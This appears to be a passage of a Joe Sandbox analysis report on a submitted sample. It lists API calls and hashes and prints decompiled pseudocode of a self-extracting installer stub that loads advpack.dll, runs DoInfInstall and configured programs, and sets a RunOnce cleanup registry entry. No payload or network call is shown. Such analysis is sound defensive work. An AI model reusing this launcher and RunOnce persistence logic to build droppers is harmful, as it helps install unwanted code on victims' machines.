                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e82163
                                                                                                                                                                                                        0x00e82172
                                                                                                                                                                                                        0x00e82172
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e82163
                                                                                                                                                                                                        0x00e820ea
                                                                                                                                                                                                        0x00e820f0
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memset.MSVCRT ref: 00E82050
                                                                                                                                                                                                        • memset.MSVCRT ref: 00E8205F
                                                                                                                                                                                                        • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 00E8208C
                                                                                                                                                                                                          • Part of subcall function 00E8171E: _vsnprintf.MSVCRT ref: 00E81750
                                                                                                                                                                                                        • RegQueryValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E820C9
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E820EA
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00E82103
                                                                                                                                                                                                        • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E82122
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00E82134
                                                                                                                                                                                                        • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E82144
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00E8215B
                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E8218C
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E821C1
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E821E4
                                                                                                                                                                                                        • RegSetValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 00E8223D
                                                                                                                                                                                                        • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E82249
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E82250
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                        • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                                                                                                                                                                        • API String ID: 178549006-3726664654
                                                                                                                                                                                                        • Opcode ID: 65f8b49924ba7443564aa55bbe6a5b34a0318319088867510b8c38f4b334db11
                                                                                                                                                                                                        • Instruction ID: 20044446cc5ad5ca8315ef6e9ec99b1226e4dcf4f1637699e5c180d40f789069
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 65f8b49924ba7443564aa55bbe6a5b34a0318319088867510b8c38f4b334db11
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5B511371A01214AFEB20BB61DC4DFFB776CEB50700F1411A9FA4DF61A1EA719E498B60
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 36 e83ba2-e83bd9 37 e83bdb-e83bee call e8468f 36->37 38 e83bfd-e83bff 36->38 44 e83d13-e83d30 call e844b9 37->44 45 e83bf4-e83bf7 37->45 40 e83c03-e83c28 memset 38->40 42 e83c2e-e83c40 call e8468f 40->42 43 e83d35-e83d48 call e81781 40->43 42->44 54 e83c46-e83c49 42->54 49 e83d4d-e83d52 43->49 57 e83f4d 44->57 45->38 45->44 52 e83d9e-e83db6 call e81ae8 49->52 53 e83d54-e83d6c call e8468f 49->53 52->57 67 e83dbc-e83dc2 52->67 53->44 69 e83d6e-e83d75 53->69 54->44 55 e83c4f-e83c56 54->55 59 e83c58-e83c5e 55->59 60 e83c60-e83c65 55->60 62 e83f4f-e83f63 call e86ce0 57->62 64 e83c6e-e83c73 59->64 65 e83c75-e83c7c 60->65 66 e83c67-e83c6d 60->66 72 e83c87-e83c89 64->72 65->72 75 e83c7e-e83c82 65->75 66->64 73 e83dc4-e83dce 67->73 74 e83de6-e83de8 67->74 70 e83fda-e83fe1 69->70 71 e83d7b-e83d98 CompareStringA 69->71 81 e83fe8-e83fea 70->81 82 e83fe3 call e82267 70->82 71->52 71->70 72->49 78 e83c8f-e83c98 72->78 73->74 77 e83dd0-e83dd7 73->77 79 e83f0b-e83f15 call e83fef 74->79 80 e83dee-e83df5 74->80 75->72 77->74 84 e83dd9-e83ddb 77->84 85 e83c9a-e83c9c 78->85 86 e83cf1-e83cf3 78->86 91 e83f1a-e83f1c 79->91 87 e83fab-e83fd2 call e844b9 LocalFree 80->87 88 e83dfb-e83dfd 80->88 81->62 82->81 84->80 92 e83ddd-e83de1 call e8202a 84->92 94 e83c9e-e83ca3 85->94 95 e83ca5-e83ca7 85->95 86->52 90 e83cf9-e83d11 call e8468f 86->90 87->57 88->79 96 e83e03-e83e0a 88->96 90->44 90->49 98 e83f1e-e83f2d LocalFree 91->98 99 e83f46-e83f47 LocalFree 91->99 92->74 102 e83cb2-e83cc5 call e8468f 94->102 95->57 103 e83cad 95->103 96->79 104 e83e10-e83e19 call e86495 96->104 106 e83f33-e83f3b 98->106 107 e83fd7-e83fd9 98->107 99->57 102->44 112 e83cc7-e83ce8 CompareStringA 102->112 103->102 113 e83e1f-e83e36 GetProcAddress 104->113 114 e83f92-e83fa9 call e844b9 104->114 106->40 107->70 112->86 115 e83cea-e83ced 112->115 116 e83e3c-e83e80 113->116 117 e83f64-e83f76 call e844b9 FreeLibrary 113->117 126 e83f7c-e83f90 LocalFree call e86285 114->126 115->86 120 e83e8b-e83e94 116->120 121 e83e82-e83e87 116->121 117->126 124 e83e9f-e83ea2 120->124 125 e83e96-e83e9b 120->125 121->120 128 e83ead-e83eb6 124->128 129 e83ea4-e83ea9 124->129 125->124 126->57 131 e83eb8-e83ebd 128->131 132 e83ec1-e83ec3 128->132 129->128 131->132 133 e83ece-e83eec 132->133 134 e83ec5-e83eca 132->134 137 e83eee-e83ef3 133->137 138 e83ef5-e83efd 133->138 134->133 137->138 139 e83eff-e83f09 FreeLibrary 138->139 140 e83f40 FreeLibrary 138->140 139->98 140->99
                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E00E83BA2() {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                                        				char _v276;
                                                                                                                                                                                                        				char _v280;
                                                                                                                                                                                                        				short _v300;
                                                                                                                                                                                                        				intOrPtr _v304;
                                                                                                                                                                                                        				void _v348;
                                                                                                                                                                                                        				char _v352;
                                                                                                                                                                                                        				intOrPtr _v356;
                                                                                                                                                                                                        				signed int _v360;
                                                                                                                                                                                                        				short _v364;
                                                                                                                                                                                                        				char* _v368;
                                                                                                                                                                                                        				intOrPtr _v372;
                                                                                                                                                                                                        				void* _v376;
                                                                                                                                                                                                        				intOrPtr _v380;
                                                                                                                                                                                                        				char _v384;
                                                                                                                                                                                                        				signed int _v388;
                                                                                                                                                                                                        				intOrPtr _v392;
                                                                                                                                                                                                        				signed int _v396;
                                                                                                                                                                                                        				signed int _v400;
                                                                                                                                                                                                        				signed int _v404;
                                                                                                                                                                                                        				void* _v408;
                                                                                                                                                                                                        				void* _v424;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t69;
                                                                                                                                                                                                        				signed int _t76;
                                                                                                                                                                                                        				void* _t77;
                                                                                                                                                                                                        				signed int _t79;
                                                                                                                                                                                                        				short _t96;
                                                                                                                                                                                                        				signed int _t97;
                                                                                                                                                                                                        				intOrPtr _t98;
                                                                                                                                                                                                        				signed int _t101;
                                                                                                                                                                                                        				signed int _t104;
                                                                                                                                                                                                        				signed int _t108;
                                                                                                                                                                                                        				int _t112;
                                                                                                                                                                                                        				void* _t115;
                                                                                                                                                                                                        				signed char _t118;
                                                                                                                                                                                                        				void* _t125;
                                                                                                                                                                                                        				signed int _t127;
                                                                                                                                                                                                        				void* _t128;
                                                                                                                                                                                                        				struct HINSTANCE__* _t129;
                                                                                                                                                                                                        				void* _t130;
                                                                                                                                                                                                        				short _t137;
                                                                                                                                                                                                        				char* _t140;
                                                                                                                                                                                                        				signed char _t144;
                                                                                                                                                                                                        				signed char _t145;
                                                                                                                                                                                                        				signed int _t149;
                                                                                                                                                                                                        				void* _t150;
                                                                                                                                                                                                        				void* _t151;
                                                                                                                                                                                                        				signed int _t153;
                                                                                                                                                                                                        				void* _t155;
                                                                                                                                                                                                        				void* _t156;
                                                                                                                                                                                                        				signed int _t157;
                                                                                                                                                                                                        				signed int _t162;
                                                                                                                                                                                                        				signed int _t164;
                                                                                                                                                                                                        				void* _t165;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                                                                                                                                                        				_t69 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t69 ^ _t164;
                                                                                                                                                                                                        				_t153 = 0;
                                                                                                                                                                                                        				 *0xe89124 =  *0xe89124 & 0;
                                                                                                                                                                                                        				_t149 = 0;
                                                                                                                                                                                                        				_v388 = 0;
                                                                                                                                                                                                        				_v384 = 0;
                                                                                                                                                                                                        				_t165 =  *0xe88a28 - _t153; // 0x0
                                                                                                                                                                                                        				if(_t165 != 0) {
                                                                                                                                                                                                        					L3:
                                                                                                                                                                                                        					_t127 = 0;
                                                                                                                                                                                                        					_v392 = 0;
                                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                                        						_v400 = _v400 & 0x00000000;
                                                                                                                                                                                                        						memset( &_v348, 0, 0x44);
                                                                                                                                                                                                        						_t164 = _t164 + 0xc;
                                                                                                                                                                                                        						_v348 = 0x44;
                                                                                                                                                                                                        						if( *0xe88c42 != 0) {
                                                                                                                                                                                                        							goto L26;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t146 =  &_v396;
                                                                                                                                                                                                        						_t115 = E00E8468F("SHOWWINDOW",  &_v396, 4);
                                                                                                                                                                                                        						if(_t115 == 0 || _t115 > 4) {
                                                                                                                                                                                                        							L25:
                                                                                                                                                                                                        							_t146 = 0x4b1;
                                                                                                                                                                                                        							E00E844B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        							 *0xe89124 = 0x80070714;
                                                                                                                                                                                                        							goto L62;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							if(_v396 != 1) {
                                                                                                                                                                                                        								__eflags = _v396 - 2;
                                                                                                                                                                                                        								if(_v396 != 2) {
                                                                                                                                                                                                        									_t137 = 3;
                                                                                                                                                                                                        									__eflags = _v396 - _t137;
                                                                                                                                                                                                        									if(_v396 == _t137) {
                                                                                                                                                                                                        										_v304 = 1;
                                                                                                                                                                                                        										_v300 = _t137;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L14;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_push(6);
                                                                                                                                                                                                        								_v304 = 1;
                                                                                                                                                                                                        								_pop(0);
                                                                                                                                                                                                        								goto L11;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_v304 = 1;
                                                                                                                                                                                                        								L11:
                                                                                                                                                                                                        								_v300 = 0;
                                                                                                                                                                                                        								L14:
                                                                                                                                                                                                        								if(_t127 != 0) {
                                                                                                                                                                                                        									L27:
                                                                                                                                                                                                        									_t155 = 1;
                                                                                                                                                                                                        									__eflags = _t127 - 1;
                                                                                                                                                                                                        									if(_t127 != 1) {
                                                                                                                                                                                                        										L31:
                                                                                                                                                                                                        										_t132 =  &_v280;
                                                                                                                                                                                                        										_t76 = E00E81AE8( &_v280,  &_v408,  &_v404); // executed
                                                                                                                                                                                                        										__eflags = _t76;
                                                                                                                                                                                                        										if(_t76 == 0) {
                                                                                                                                                                                                        											L62:
                                                                                                                                                                                                        											_t77 = 0;
                                                                                                                                                                                                        											L63:
                                                                                                                                                                                                        											_pop(_t150);
                                                                                                                                                                                                        											_pop(_t156);
                                                                                                                                                                                                        											_pop(_t128);
                                                                                                                                                                                                        											return E00E86CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t157 = _v404;
                                                                                                                                                                                                        										__eflags = _t149;
                                                                                                                                                                                                        										if(_t149 != 0) {
                                                                                                                                                                                                        											L37:
                                                                                                                                                                                                        											__eflags = _t157;
                                                                                                                                                                                                        											if(_t157 == 0) {
                                                                                                                                                                                                        												L57:
                                                                                                                                                                                                        												_t151 = _v408;
                                                                                                                                                                                                        												_t146 =  &_v352;
                                                                                                                                                                                                        												_t130 = _t151; // executed
                                                                                                                                                                                                        												_t79 = E00E83FEF(_t130,  &_v352); // executed
                                                                                                                                                                                                        												__eflags = _t79;
                                                                                                                                                                                                        												if(_t79 == 0) {
                                                                                                                                                                                                        													L61:
                                                                                                                                                                                                        													LocalFree(_t151);
                                                                                                                                                                                                        													goto L62;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												L58:
                                                                                                                                                                                                        												LocalFree(_t151);
                                                                                                                                                                                                        												_t127 = _t127 + 1;
                                                                                                                                                                                                        												_v396 = _t127;
                                                                                                                                                                                                        												__eflags = _t127 - 2;
                                                                                                                                                                                                        												if(_t127 >= 2) {
                                                                                                                                                                                                        													_t155 = 1;
                                                                                                                                                                                                        													__eflags = 1;
                                                                                                                                                                                                        													L69:
                                                                                                                                                                                                        													__eflags =  *0xe88580;
                                                                                                                                                                                                        													if( *0xe88580 != 0) {
                                                                                                                                                                                                        														E00E82267();
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        													_t77 = _t155;
                                                                                                                                                                                                        													goto L63;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												_t153 = _v392;
                                                                                                                                                                                                        												_t149 = _v388;
                                                                                                                                                                                                        												continue;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											L38:
                                                                                                                                                                                                        											__eflags =  *0xe88180;
                                                                                                                                                                                                        											if( *0xe88180 == 0) {
                                                                                                                                                                                                        												_t146 = 0x4c7;
                                                                                                                                                                                                        												E00E844B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                                                                                                                                                        												LocalFree(_v424);
                                                                                                                                                                                                        												 *0xe89124 = 0x8007042b;
                                                                                                                                                                                                        												goto L62;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags = _t157;
                                                                                                                                                                                                        											if(_t157 == 0) {
                                                                                                                                                                                                        												goto L57;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags =  *0xe89a34 & 0x00000004;
                                                                                                                                                                                                        											if(__eflags == 0) {
                                                                                                                                                                                                        												goto L57;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t129 = E00E86495(_t127, _t132, _t157, __eflags);
                                                                                                                                                                                                        											__eflags = _t129;
                                                                                                                                                                                                        											if(_t129 == 0) {
                                                                                                                                                                                                        												_t146 = 0x4c8;
                                                                                                                                                                                                        												E00E844B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                                                                                                                                                        												L65:
                                                                                                                                                                                                        												LocalFree(_v408);
                                                                                                                                                                                                        												 *0xe89124 = E00E86285();
                                                                                                                                                                                                        												goto L62;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                                                                                                                                                        											_v404 = _t146;
                                                                                                                                                                                                        											__eflags = _t146;
                                                                                                                                                                                                        											if(_t146 == 0) {
                                                                                                                                                                                                        												_t146 = 0x4c9;
                                                                                                                                                                                                        												__eflags = 0;
                                                                                                                                                                                                        												E00E844B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                                                                                                                                                        												FreeLibrary(_t129);
                                                                                                                                                                                                        												goto L65;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags =  *0xe88a30;
                                                                                                                                                                                                        											_t151 = _v408;
                                                                                                                                                                                                        											_v384 = 0;
                                                                                                                                                                                                        											_v368 =  &_v280;
                                                                                                                                                                                                        											_t96 =  *0xe89a40; // 0x3
                                                                                                                                                                                                        											_v364 = _t96;
                                                                                                                                                                                                        											_t97 =  *0xe88a38 & 0x0000ffff;
                                                                                                                                                                                                        											_v380 = 0xe89154;
                                                                                                                                                                                                        											_v376 = _t151;
                                                                                                                                                                                                        											_v372 = 0xe891e4;
                                                                                                                                                                                                        											_v360 = _t97;
                                                                                                                                                                                                        											if( *0xe88a30 != 0) {
                                                                                                                                                                                                        												_t97 = _t97 | 0x00010000;
                                                                                                                                                                                                        												__eflags = _t97;
                                                                                                                                                                                                        												_v360 = _t97;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t144 =  *0xe89a34; // 0x1
                                                                                                                                                                                                        											__eflags = _t144 & 0x00000008;
                                                                                                                                                                                                        											if((_t144 & 0x00000008) != 0) {
                                                                                                                                                                                                        												_t97 = _t97 | 0x00020000;
                                                                                                                                                                                                        												__eflags = _t97;
                                                                                                                                                                                                        												_v360 = _t97;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags = _t144 & 0x00000010;
                                                                                                                                                                                                        											if((_t144 & 0x00000010) != 0) {
                                                                                                                                                                                                        												_t97 = _t97 | 0x00040000;
                                                                                                                                                                                                        												__eflags = _t97;
                                                                                                                                                                                                        												_v360 = _t97;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t145 =  *0xe88d48; // 0x0
                                                                                                                                                                                                        											__eflags = _t145 & 0x00000040;
                                                                                                                                                                                                        											if((_t145 & 0x00000040) != 0) {
                                                                                                                                                                                                        												_t97 = _t97 | 0x00080000;
                                                                                                                                                                                                        												__eflags = _t97;
                                                                                                                                                                                                        												_v360 = _t97;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags = _t145;
                                                                                                                                                                                                        											if(_t145 < 0) {
                                                                                                                                                                                                        												_t104 = _t97 | 0x00100000;
                                                                                                                                                                                                        												__eflags = _t104;
                                                                                                                                                                                                        												_v360 = _t104;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t98 =  *0xe89a38; // 0x0
                                                                                                                                                                                                        											_v356 = _t98;
                                                                                                                                                                                                        											_t130 = _t146;
                                                                                                                                                                                                        											 *0xe8a288( &_v384);
                                                                                                                                                                                                        											_t101 = _v404();
                                                                                                                                                                                                        											__eflags = _t164 - _t164;
                                                                                                                                                                                                        											if(_t164 != _t164) {
                                                                                                                                                                                                        												_t130 = 4;
                                                                                                                                                                                                        												asm("int 0x29");
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											 *0xe89124 = _t101;
                                                                                                                                                                                                        											_push(_t129);
                                                                                                                                                                                                        											__eflags = _t101;
                                                                                                                                                                                                        											if(_t101 < 0) {
                                                                                                                                                                                                        												FreeLibrary();
                                                                                                                                                                                                        												goto L61;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												FreeLibrary();
                                                                                                                                                                                                        												_t127 = _v400;
                                                                                                                                                                                                        												goto L58;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags =  *0xe89a40 - 1; // 0x3
                                                                                                                                                                                                        										if(__eflags == 0) {
                                                                                                                                                                                                        											goto L37;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags =  *0xe88a20;
                                                                                                                                                                                                        										if( *0xe88a20 == 0) {
                                                                                                                                                                                                        											goto L37;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags = _t157;
                                                                                                                                                                                                        										if(_t157 != 0) {
                                                                                                                                                                                                        											goto L38;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_v388 = 1;
                                                                                                                                                                                                        										E00E8202A(_t146); // executed
                                                                                                                                                                                                        										goto L37;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t146 =  &_v280;
                                                                                                                                                                                                        									_t108 = E00E8468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                                                                                                                                                        									__eflags = _t108;
                                                                                                                                                                                                        									if(_t108 == 0) {
                                                                                                                                                                                                        										goto L25;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									__eflags =  *0xe88c42;
                                                                                                                                                                                                        									if( *0xe88c42 != 0) {
                                                                                                                                                                                                        										goto L69;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                                                                                                                                                        									__eflags = _t112 == 0;
                                                                                                                                                                                                        									if(_t112 == 0) {
                                                                                                                                                                                                        										goto L69;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L31;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t118 =  *0xe88a38; // 0x0
                                                                                                                                                                                                        								if(_t118 == 0) {
                                                                                                                                                                                                        									L23:
                                                                                                                                                                                                        									if(_t153 != 0) {
                                                                                                                                                                                                        										goto L31;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t146 =  &_v276;
                                                                                                                                                                                                        									if(E00E8468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                                                                                                                                                        										goto L27;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L25;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								if((_t118 & 0x00000001) == 0) {
                                                                                                                                                                                                        									__eflags = _t118 & 0x00000002;
                                                                                                                                                                                                        									if((_t118 & 0x00000002) == 0) {
                                                                                                                                                                                                        										goto L62;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t140 = "USRQCMD";
                                                                                                                                                                                                        									L20:
                                                                                                                                                                                                        									_t146 =  &_v276;
                                                                                                                                                                                                        									if(E00E8468F(_t140,  &_v276, 0x104) == 0) {
                                                                                                                                                                                                        										goto L25;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                                                                                                                                                        										_t153 = 1;
                                                                                                                                                                                                        										_v388 = 1;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L23;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t140 = "ADMQCMD";
                                                                                                                                                                                                        								goto L20;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						L26:
                                                                                                                                                                                                        						_push(_t130);
                                                                                                                                                                                                        						_t146 = 0x104;
                                                                                                                                                                                                        						E00E81781( &_v276, 0x104, _t130, 0xe88c42);
                                                                                                                                                                                                        						goto L27;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t130 = "REBOOT";
                                                                                                                                                                                                        				_t125 = E00E8468F(_t130, 0xe89a2c, 4);
                                                                                                                                                                                                        				if(_t125 == 0 || _t125 > 4) {
                                                                                                                                                                                                        					goto L25;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					goto L3;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}





























































                                                                                                                                                                                                        0x00e83baa
                                                                                                                                                                                                        0x00e83bb0
                                                                                                                                                                                                        0x00e83bb7
                                                                                                                                                                                                        0x00e83bc0
                                                                                                                                                                                                        0x00e83bc2
                                                                                                                                                                                                        0x00e83bc9
                                                                                                                                                                                                        0x00e83bcb
                                                                                                                                                                                                        0x00e83bcf
                                                                                                                                                                                                        0x00e83bd3
                                                                                                                                                                                                        0x00e83bd9
                                                                                                                                                                                                        0x00e83bfd
                                                                                                                                                                                                        0x00e83bfd
                                                                                                                                                                                                        0x00e83bff
                                                                                                                                                                                                        0x00e83c03
                                                                                                                                                                                                        0x00e83c03
                                                                                                                                                                                                        0x00e83c11
                                                                                                                                                                                                        0x00e83c16
                                                                                                                                                                                                        0x00e83c19
                                                                                                                                                                                                        0x00e83c28
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83c30
                                                                                                                                                                                                        0x00e83c39
                                                                                                                                                                                                        0x00e83c40
                                                                                                                                                                                                        0x00e83d13
                                                                                                                                                                                                        0x00e83d15
                                                                                                                                                                                                        0x00e83d21
                                                                                                                                                                                                        0x00e83d26
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83c4f
                                                                                                                                                                                                        0x00e83c56
                                                                                                                                                                                                        0x00e83c60
                                                                                                                                                                                                        0x00e83c65
                                                                                                                                                                                                        0x00e83c77
                                                                                                                                                                                                        0x00e83c78
                                                                                                                                                                                                        0x00e83c7c
                                                                                                                                                                                                        0x00e83c7e
                                                                                                                                                                                                        0x00e83c82
                                                                                                                                                                                                        0x00e83c82
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83c7c
                                                                                                                                                                                                        0x00e83c67
                                                                                                                                                                                                        0x00e83c69
                                                                                                                                                                                                        0x00e83c6d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83c58
                                                                                                                                                                                                        0x00e83c58
                                                                                                                                                                                                        0x00e83c6e
                                                                                                                                                                                                        0x00e83c6e
                                                                                                                                                                                                        0x00e83c87
                                                                                                                                                                                                        0x00e83c89
                                                                                                                                                                                                        0x00e83d4d
                                                                                                                                                                                                        0x00e83d4f
                                                                                                                                                                                                        0x00e83d50
                                                                                                                                                                                                        0x00e83d52
                                                                                                                                                                                                        0x00e83d9e
                                                                                                                                                                                                        0x00e83da8
                                                                                                                                                                                                        0x00e83daf
                                                                                                                                                                                                        0x00e83db4
                                                                                                                                                                                                        0x00e83db6
                                                                                                                                                                                                        0x00e83f4d
                                                                                                                                                                                                        0x00e83f4d
                                                                                                                                                                                                        0x00e83f4f
                                                                                                                                                                                                        0x00e83f56
                                                                                                                                                                                                        0x00e83f57
                                                                                                                                                                                                        0x00e83f58
                                                                                                                                                                                                        0x00e83f63
                                                                                                                                                                                                        0x00e83f63
                                                                                                                                                                                                        0x00e83dbc
                                                                                                                                                                                                        0x00e83dc0
                                                                                                                                                                                                        0x00e83dc2
                                                                                                                                                                                                        0x00e83de6
                                                                                                                                                                                                        0x00e83de6
                                                                                                                                                                                                        0x00e83de8
                                                                                                                                                                                                        0x00e83f0b
                                                                                                                                                                                                        0x00e83f0b
                                                                                                                                                                                                        0x00e83f0f
                                                                                                                                                                                                        0x00e83f13
                                                                                                                                                                                                        0x00e83f15
                                                                                                                                                                                                        0x00e83f1a
                                                                                                                                                                                                        0x00e83f1c
                                                                                                                                                                                                        0x00e83f46
                                                                                                                                                                                                        0x00e83f47
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83f47
                                                                                                                                                                                                        0x00e83f1e
                                                                                                                                                                                                        0x00e83f1f
                                                                                                                                                                                                        0x00e83f25
                                                                                                                                                                                                        0x00e83f26
                                                                                                                                                                                                        0x00e83f2a
                                                                                                                                                                                                        0x00e83f2d
                                                                                                                                                                                                        0x00e83fd9
                                                                                                                                                                                                        0x00e83fd9
                                                                                                                                                                                                        0x00e83fda
                                                                                                                                                                                                        0x00e83fda
                                                                                                                                                                                                        0x00e83fe1
                                                                                                                                                                                                        0x00e83fe3
                                                                                                                                                                                                        0x00e83fe3
                                                                                                                                                                                                        0x00e83fe8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83fe8
                                                                                                                                                                                                        0x00e83f33
                                                                                                                                                                                                        0x00e83f37
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83f37
                                                                                                                                                                                                        0x00e83dee
                                                                                                                                                                                                        0x00e83dee
                                                                                                                                                                                                        0x00e83df5
                                                                                                                                                                                                        0x00e83fad
                                                                                                                                                                                                        0x00e83fb9
                                                                                                                                                                                                        0x00e83fc2
                                                                                                                                                                                                        0x00e83fc8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83fc8
                                                                                                                                                                                                        0x00e83dfb
